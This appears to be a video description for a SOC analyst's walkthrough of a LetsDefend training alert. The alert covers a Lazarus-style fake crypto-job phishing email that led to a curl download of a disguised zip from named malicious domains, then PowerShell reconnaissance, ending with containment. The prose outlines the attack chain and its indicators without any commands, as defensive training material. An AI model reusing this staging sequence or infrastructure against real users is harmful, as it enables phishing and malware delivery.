Lazarus APT38 Phishing Fake Crypto Job → curl Payload → PowerShell Recon | LetsDefend Alert SOC337
Day 107 of Becoming a SOC Analyst — SOC337 Lazarus Phishing Campaign Detected APT38 (True Positive)
A phishing email with subject "Invitation Coinbase Crypto Trader Hiring Assessment" was delivered to Ellen at letsdefend.io, containing a malicious link to blockchainjobhub.com — confirmed crypto phishing infrastructure. Logs confirm the user clicked the link, triggering curl.exe spawned from explorer.exe (EventID 4688) to download nvidiaupdate.zip from api.drivercams.cloud and a secondary S3 staging source, followed by PowerShell extraction and registry query reconnaissance — a textbook Lazarus APT38 initial access and staging sequence. Endpoint was contained before lateral movement.
🔬 Analysis Reports
🧪 Hybrid Analysis → https://hybrid-analysis.com/sample/f5...
🦠 VirusTotal (blockchainjobhub.com) → https://www.virustotal.com/gui/url/1d...
🦠 VirusTotal (drivercams.cloud) → https://www.virustotal.com/gui/url/4d...
🦠 VirusTotal (S3 source) → https://www.virustotal.com/gui/url/97...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 107 intro
01:00 Alert Details
01:30 Investigation
16:38 Playbook Answers
23:45 5w Log
27:00 Result
27:20 summary and thoughts
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #LazarusGroup #APT38 #Phishing #CryptoScam #PowerShell #IncidentResponse #SIEM #Day107 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity